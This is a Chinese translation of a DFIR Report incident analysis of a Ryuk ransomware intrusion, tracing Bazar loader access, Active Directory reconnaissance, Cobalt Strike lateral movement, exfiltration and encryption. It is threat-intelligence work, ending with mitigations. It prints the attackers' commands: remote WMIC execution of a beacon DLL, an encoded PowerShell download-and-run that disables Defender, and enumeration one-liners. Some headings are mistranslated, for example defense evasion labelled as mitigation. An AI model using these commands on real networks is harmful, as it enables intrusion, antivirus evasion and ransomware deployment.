Ryuk 勒索事件分析
一般勒索軟件都是通過大規模垃圾郵件活動和漏洞利用工具進行傳播,而Ryuk更傾向于一種定制化的攻擊。事實上,其加密機制也主要是用于小規模的行動的,比如只加密受感染網絡中的重要資產和資源。Ryuk勒索病毒最早在2018年8月由國外某安全公司發現并報道,此勒索病毒主要通過垃圾郵件或漏洞利用工具包進行傳播感染。2020年1月至今,工業企業的生產網絡或辦公網絡遭受數十起勒索軟件攻擊,其中僅Ryuk勒索軟件就感染了EVRAZ、EMCOR Group、EWA等多家工業企業,加密企業關鍵數據信息,導致企業停工、停產,造成重大的經濟損失。2019年,美國海岸警衛隊(USCG)近日宣布該惡意軟件破壞了美國的《海上運輸安全法》(MTSA)監管機構的企業IT網絡。根據USCG表示,攻擊媒介可能是在 MTSA設施上發送網絡釣魚電子郵件給運營商 ,一旦員工點擊了電子郵件中的嵌入式惡意鏈接,勒索軟件就加密了受威脅者的重要企業信息技術(IT)網絡信息,從而阻止了工作人員訪問該設施的關鍵文件。據了解,Ryuk勒索軟件還感染了美國某工業公司的網絡系統,黑客組織對監視系統和貨物轉移的操作系統進行控制,對至關重要的文件加密。
如上所述Ryuk過去幾年來一直非常活躍,FBI聲稱截至2020年2月,該組織共獲利了6100萬美元。今年年初時候,該組織變得有點安靜,但過去幾周發生了變化,發生了類似UHS醫院那樣的事件。今年9月,醫院遍布美、英的美國最大連鎖醫院Universal Health Systems(UHS)遭到勒索軟件攻擊IT系統,系統遭癱瘓多時,醫院也被迫將急診病患轉院。目前受影響的醫院遍及亞利桑納州、加州、喬治亞、賓州、佛州等地。被勒索軟件加密的文件皆有.ryk的文件擴展名,而且從黑客留下的勒索消息語法來判斷,作亂的可能是知名勒索軟件Ryuk。一名安全研究人員指出,這次事件顯示Ryuk在經過幾個月沉寂后重出江湖。根據其研究團隊推測,Ryuk可能是經由釣魚信件誘使用戶打開,而進入UHS的計算機系統中。
目前Ryuk組織發布的勒索軟件可以在29小時內將一封惡意電子郵件發送到整個域,并要求超過600萬美元的贖金。攻擊者使用了Cobalt Strike,AdFind,WMI,vsftpd,PowerShell,PowerView和Rubeus等工具來實現他們的勒索目標。
在這種情況下,攻擊是通過稱為Bazar/Kegtap的裝載程序惡意軟件開始的。研究表明,通過垃圾郵件發送的電子郵件在9月份期間一直呈上升趨勢。
從最初執行有效負載開始,Bazar會注入各種進程,包括explorer.exe和svchost.exe以及生成cmd.exe進程。這個活動的最初目標是運行發現使用內置在Windows工具,如nltest, net group,和第三方工具AdFind。
在最初被發現之后,Bazar惡意軟件保持相對安靜,直到第二輪攻擊中猜得到充分發揮。再次,在第二輪發現中使用了相同的工具,還有Rubeus。這次,發現攻擊通過FTP泄漏到俄羅斯托管的服務器。接下來,攻擊者開始橫向移動。
從遠程WMI到使用PowerShell遠程執行服務,都進行了幾次嘗試,使用了各種方法,直到最終登陸通過SMB傳輸的Cobalt Strike beacon可執行文件以在環境中移動。這樣,攻擊者依靠在域控制器上運行的Cobalt Strike信標作為主要操作點。
在選擇了最可靠的方法來遍歷整個環境后,攻擊者隨后在整個企業范圍內建立了信標。為了實現最終目標,他們使用PowerShell在環境中禁用Windows Defender。
首先將域中用于備份的服務器作為加密目標,并在主機上完成一些準備工作。但是,一旦Ryuk勒索可執行文件從其域控制器(DC)pivot通過SMB傳輸后,只需一分鐘即可執行它。
此時,Ryuk已通過SMB轉移到環境中的其余主機,并通過來自pivot域控制器的RDP連接執行。從最初執行Bazar到覆蓋整個域,該活動總共持續了29個小時。
攻擊者索要了600多個比特幣,這些比特幣的市場價值約為600多萬美元。
發現過程
要詳細了解技術細節和攻擊者的戰術、技術和程序,請繼續閱讀“ MITRE ATT&CK”部分。
MITRE ATT&CK
初始訪問
最初是通過帶有Bazar/Kegtap后門加載器鏈接的電子郵件發送的,研究人員下載并運行了Document-Preview.exe,該文件通過443/https連接到5.182.210[.]145。
執行
在橫向移動過程中,多次使用服務執行來執行腳本和可執行文件。
在嘗試橫向執行dll時也使用了WMI。
- WMIC /node:"DC.example.domain" process call create "rundll32 C:\PerfLogs\arti64.dll, StartW"
攻擊者還執行了進程注入。
緩解措施
禁用Windows Defender
- powershell -nop -exec bypass -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADcALgAwAC4AMAAuADEAOgA3ADgAMAAxAC8AJwApADsAIABTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAAJAB0AHIAdQBlAA==
檢測過程
第一天的檢測過程
在執行Document-Preview.exe后幾分鐘,AdFind和adf.bat被刪除并運行了幾分鐘。我們已經看過adf.bat多次,你可以在此處了解更多信息。批處理文件將信息輸出到以下文本文件中。
Nltest用于檢查域信任。
- nltest /domain_trusts /all_trusts
Net用來顯示域管理員。
- net group "Domain admins" /DOMAIN
Ping用于測試系統是否在環境中正常運行。
- ping hostname.domain.local
在第1天從Bazar加載器中分解活動的流程樹。
第二天的檢測過程
Afind再次運行,然后攻擊者嘗試使用Rubeus攻擊Kerberoast。
在橫向運動失敗期間幾次誤啟動之后,攻擊者執行了一些其他的本地系統檢測。
- systeminfo
- nltest /dclist:
- Get-NetSubnet
- Get-NetComputer -operatingsystem *server*
- Invoke-CheckLocalAdminAccess
- Find-LocalAdminAccess
使用WMI在許多系統上檢查當前的AntiVirus。
- WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
- Import-Module ActiveDirectory; Get-ADComputer -Filter {enabled -eq $true} -properties *|select Name, DNSHostName, OperatingSystem, LastLogonDate | Export-CSV C:\Users\AllWindows.csv -NoTypeInformation -Encoding UTF8
橫向運動
在第一天,攻擊者在繼續進行更多發現之前檢查了MS17-010的域控制器。該系統不容易受到MS17-010攻擊。
橫向移動在最初進入后28小時左右開始,使用SMB在域控制器上放置了Cobalt Strike Beacon。這樣攻擊者就可以使用WMIC執行信標。
- WMIC /node:\"DC.example.domain\" process call create \"rundll32 C:\\PerfLogs\\arti64.dll, StartW\"
該攻擊似乎沒有成功運行,因為攻擊者在沒有明顯的命令和控制流量后不久就在beachhead主機上釋放了一個額外的載荷,然后在DC上執行了一項服務。
解碼后的Powershell。
此后,攻擊者復制并執行了Cobalt Strike信標可執行文件,并通過域控制器上的服務將其啟動。
此時,C2連接出現在域控制器上,該控制器通過443/https連接到martahzz[.]com – 88.119.171[.]75。
在從beachhead主機執行第一次橫向移動之后大約一小時執行一次,使用SMB exe執行備用系統的橫向移動。
攻擊者在許多系統上運行信標時遇到問題,并且在至少一個系統上,他們遠程安裝了驅動器。
- C:\Windows\system32\cmd.exe /C dir \\Server\c$
命令與控制
漏洞
vsftpd將域發現(AdFind和Rubeus輸出)擴展為45.141.84[.]120。
惡意影響
SMB用于傳輸Ryuk可執行文件,然后,從第一個被破壞的DC建立RDP連接,然后從備份服務器開始在整個環境中執行勒索軟件。在執行備份之前,攻擊者在備份服務器上啟動了wbadmin msc控制臺。
在勒索執行之前先執行命令:
所有系統都留下了以下贖金說明:
攻擊者要求提供超過600萬美元,但愿意進行談判。
針對Ryuk的一系列攻擊事件,你可以采取以下緩解措施
完善入侵檢測和入侵防御系統;
可監控實時網絡流量行業標準和最新的病毒檢測軟件;
集中分析那些受監控的主機和服務器日志記錄;
對網絡分段以防止IT系統訪問運營技術(OT)環境;
最新的IT/OT網絡圖;
所有關鍵文件和軟件的一致備份;
本文翻譯自:https://thedfirreport.com/2020/10/08/ryuks-return/如若轉載,請注明原文地址。
